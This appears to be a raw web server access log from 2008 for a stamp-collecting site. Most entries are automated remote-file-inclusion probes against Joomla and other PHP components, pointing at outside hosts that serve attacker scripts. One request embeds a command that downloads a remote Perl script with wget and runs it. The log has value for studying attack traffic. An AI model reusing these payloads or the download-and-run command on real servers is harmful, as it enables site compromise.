66.129.109.12 - - [15/Jun/2008:19:28:04 -0700] "GET /logs/access_080519.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ratpox.com/photos/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.129.109.12 - - [15/Jun/2008:19:28:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ratpox.com/photos/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
66.129.109.12 - - [15/Jun/2008:19:28:05 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ratpox.com/photos/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
24.254.19.139 - - [15/Jun/2008:19:29:05 -0700] "GET /logs/access_080421.log HTTP/1.0" 200 1179648 "http://search.yahoo.com/search;_ylt=A0geu6Upz1VI5gMAlfBXNyoA?p=ibukimasta.com&fr=yfp-t-379&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MEGAUPLOAD 2.0; .NET CLR 1.1.4322)" "www.mathstamps.com"
200.250.121.2 - - [15/Jun/2008:19:30:10 -0700] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.67.237.142 - - [15/Jun/2008:19:30:33 -0700] "GET /logs/access_080519.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ratpox.com/photos/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.67.237.142 - - [15/Jun/2008:19:30:33 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ratpox.com/photos/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.67.237.142 - - [15/Jun/2008:19:30:33 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://ratpox.com/photos/i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:19:35:40 -0700] "GET /logs/access_080519.log/include.php?path=psp/user.php&site=psp//include.php?path=psp/user.php&site=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.195.11.193 - - [15/Jun/2008:19:36:19 -0700] "GET /logs/access_080602.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.195.11.193 - - [15/Jun/2008:19:36:20 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.195.11.193 - - [15/Jun/2008:19:36:20 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:19:37:49 -0700] "GET /logs/access_080414.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:19:37:50 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.181.217.196 - - [15/Jun/2008:19:38:28 -0700] "GET /logs/access_080519.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.55.151.19 - - [15/Jun/2008:19:40:14 -0700] "GET /logs/access_080218.log HTTP/1.1" 206 54367 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.mathstamps.com"
212.227.85.13 - - [15/Jun/2008:19:45:49 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
212.227.85.13 - - [15/Jun/2008:19:45:55 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.195.11.193 - - [15/Jun/2008:19:47:07 -0700] "GET /logs/access_080505.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [15/Jun/2008:19:47:36 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [15/Jun/2008:19:47:37 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [15/Jun/2008:19:47:37 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:19:47:41 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.172.184.72 - - [15/Jun/2008:19:47:41 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:19:47:41 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.192.77.38 - - [15/Jun/2008:19:48:00 -0700] "GET /logs/access_080324.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.192.77.38 - - [15/Jun/2008:19:48:00 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.192.77.38 - - [15/Jun/2008:19:48:00 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.192.77.38 - - [15/Jun/2008:19:48:03 -0700] "GET /logs/access_080324.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.192.77.38 - - [15/Jun/2008:19:48:04 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.192.77.38 - - [15/Jun/2008:19:48:04 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.192.77.38 - - [15/Jun/2008:19:48:31 -0700] "GET /logs/access_080317.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
67.192.77.38 - - [15/Jun/2008:19:48:38 -0700] "GET /logs/access_080317.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.lubricarca.com/portal/modules/Forums/admin/tx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:19:48:56 -0700] "GET /!scanhttp://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:19:49:49 -0700] "GET /logs/access_080331.log/!scanhttp://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:19:49:49 -0700] "GET /!scanhttp://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:19:49:50 -0700] "GET /logs/!scanhttp://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.55.76.110 - - [15/Jun/2008:19:52:07 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.55.76.110 - - [15/Jun/2008:19:52:07 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.55.76.110 - - [15/Jun/2008:19:52:07 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h.b-warez.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
66.249.73.97 - - [15/Jun/2008:19:53:28 -0700] "GET /logs/access_080526.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mathstamps.com"
66.249.73.97 - - [15/Jun/2008:19:53:28 -0700] "GET /logs/access_080602.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.mathstamps.com"
202.221.143.111 - - [15/Jun/2008:19:54:59 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:19:55:51 -0700] "GET /logs/access_080512.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:19:55:51 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:19:55:52 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:19:57:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:20:02:36 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.32.194.164 - - [15/Jun/2008:20:04:29 -0700] "GET /logs/Full_Release/include/body_comm.inc.php?content=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.32.194.164 - - [15/Jun/2008:20:04:29 -0700] "GET /logs/access_080526.log/Full_Release/include/body_comm.inc.php?content=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.32.194.164 - - [15/Jun/2008:20:04:29 -0700] "GET /Full_Release/include/body_comm.inc.php?content=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:20:06:44 -0700] "GET /logs/access_080602.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.250.121.2 - - [15/Jun/2008:20:08:46 -0700] "GET /logs/access_080414.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.250.121.2 - - [15/Jun/2008:20:08:47 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.250.121.2 - - [15/Jun/2008:20:08:48 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
150.165.231.5 - - [15/Jun/2008:20:12:36 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
150.165.231.5 - - [15/Jun/2008:20:12:37 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/safeon??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.17.185 - - [15/Jun/2008:20:13:30 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.8.104 - - [15/Jun/2008:20:15:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
67.195.58.157 - - [15/Jun/2008:20:15:07 -0700] "GET /logs/access_080324.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:20:16:22 -0700] "GET /logs/access.log/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:20:16:23 -0700] "GET /ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:20:16:23 -0700] "GET /logs/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
77.79.246.200 - - [15/Jun/2008:20:16:33 -0700] "GET /logs/access_080414.log/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:20:16:38 -0700] "GET /logs/Full_Release/include/body_comm.inc.php?content=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.172.184.72 - - [15/Jun/2008:20:16:38 -0700] "GET /Full_Release/include/body_comm.inc.php?content=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:20:16:38 -0700] "GET /logs/access_080526.log/Full_Release/include/body_comm.inc.php?content=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:20:16:38 -0700] "GET /logs/access.log/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:20:16:38 -0700] "GET /ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:20:16:38 -0700] "GET /logs/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
70.85.192.194 - - [15/Jun/2008:20:16:45 -0700] "GET /logs/access_080414.log/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.68.101.180 - - [15/Jun/2008:20:17:27 -0700] "GET /logs/access_080602.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.68.101.180 - - [15/Jun/2008:20:17:28 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.68.101.180 - - [15/Jun/2008:20:17:28 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
65.98.70.18 - - [15/Jun/2008:20:17:45 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:20:18:06 -0700] "GET /logs/access.log/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:20:18:06 -0700] "GET /ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:20:18:07 -0700] "GET /logs/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.43.197.73 - - [15/Jun/2008:20:19:12 -0700] "GET /logs/access_080414.log/ftag.php?mostrar=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.97.179 - - [15/Jun/2008:20:26:07 -0700] "GET /logs/access_080519.log//gallery//update/update5.php?lang=http://www.funk-trucks.de//templates/stardom/a2?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
212.227.97.179 - - [15/Jun/2008:20:26:07 -0700] "GET //gallery//update/update5.php?lang=http://www.funk-trucks.de//templates/stardom/a2?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
200.68.101.180 - - [15/Jun/2008:20:26:14 -0700] "GET /logs/access_080505.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.97.179 - - [15/Jun/2008:20:26:18 -0700] "GET /logs/access_080526.log//gallery//update/update5.php?lang=http://www.funk-trucks.de//templates/stardom/a2?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.mathstamps.com"
65.98.70.18 - - [15/Jun/2008:20:27:06 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.70.18 - - [15/Jun/2008:20:27:06 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.227.97.179 - - [15/Jun/2008:20:27:25 -0700] "GET //gallery//update/update5.php?lang=http://www.funk-trucks.de//templates/stardom/a2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.97.179 - - [15/Jun/2008:20:30:07 -0700] "GET /logs/access_080526.log//gallery//update/update5.php?lang=http://www.funk-trucks.de//templates/stardom/a2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.97.179 - - [15/Jun/2008:20:30:07 -0700] "GET //gallery//update/update5.php?lang=http://www.funk-trucks.de//templates/stardom/a2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.97.179 - - [15/Jun/2008:20:30:07 -0700] "GET /logs//gallery//update/update5.php?lang=http://www.funk-trucks.de//templates/stardom/a2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
86.109.103.189 - - [15/Jun/2008:20:30:55 -0700] "GET /logs/access_080519.log/scanhttp://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
86.109.103.189 - - [15/Jun/2008:20:30:55 -0700] "GET /scanhttp://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
86.109.103.189 - - [15/Jun/2008:20:30:56 -0700] "GET /logs/scanhttp://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.98.70.18 - - [15/Jun/2008:20:32:14 -0700] "GET /logs/access_080526.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.dichotomy.com.au/tmp/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
212.227.251.172 - - [15/Jun/2008:20:33:02 -0700] "GET /scanhttp://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.97.179 - - [15/Jun/2008:20:34:30 -0700] "GET /logs/access_080519.log//gallery//update/update5.php?lang=http://www.funk-trucks.de//templates/stardom/a2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:20:35:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.172.184.72 - - [15/Jun/2008:20:35:44 -0700] "GET /logs/access_080428.log//skin/zero_vote/error.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
202.47.247.136 - - [15/Jun/2008:20:35:44 -0700] "GET //skin/zero_vote/error.php?dir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:20:36:01 -0700] "GET /logs/access_080414.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:20:36:01 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
203.57.68.22 - - [15/Jun/2008:20:36:02 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://electrometro.com.ve/wall/xpl/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.86.129.164 - - [15/Jun/2008:20:38:04 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.serficoin.com/components/com_zoom/classes/iptc/makernotes/.../i??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
208.38.187.20 - - [15/Jun/2008:20:38:32 -0700] "GET /index2.php?DoAction=http://www.topshoppingcenters.com/mvk/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
160.99.12.231 - - [15/Jun/2008:20:39:37 -0700] "GET /logs/access_080519.log/scanhttp://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [15/Jun/2008:20:39:37 -0700] "GET /scanhttp://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [15/Jun/2008:20:39:38 -0700] "GET /logs/scanhttp://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.38.187.20 - - [15/Jun/2008:20:39:39 -0700] "GET /logs/access_080526.log/index2.php?DoAction=http://www.topshoppingcenters.com/mvk/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
208.38.187.20 - - [15/Jun/2008:20:39:39 -0700] "GET /logs/index2.php?DoAction=http://www.topshoppingcenters.com/mvk/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
208.38.187.20 - - [15/Jun/2008:20:39:56 -0700] "GET /logs/access_080428.log/index2.php?DoAction=http://www.topshoppingcenters.com/mvk/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
75.125.15.242 - - [15/Jun/2008:20:53:52 -0700] "GET /logs/PHPDJ_v05/dj/djpage.php?page=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
75.125.15.242 - - [15/Jun/2008:20:53:52 -0700] "GET /PHPDJ_v05/dj/djpage.php?page=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
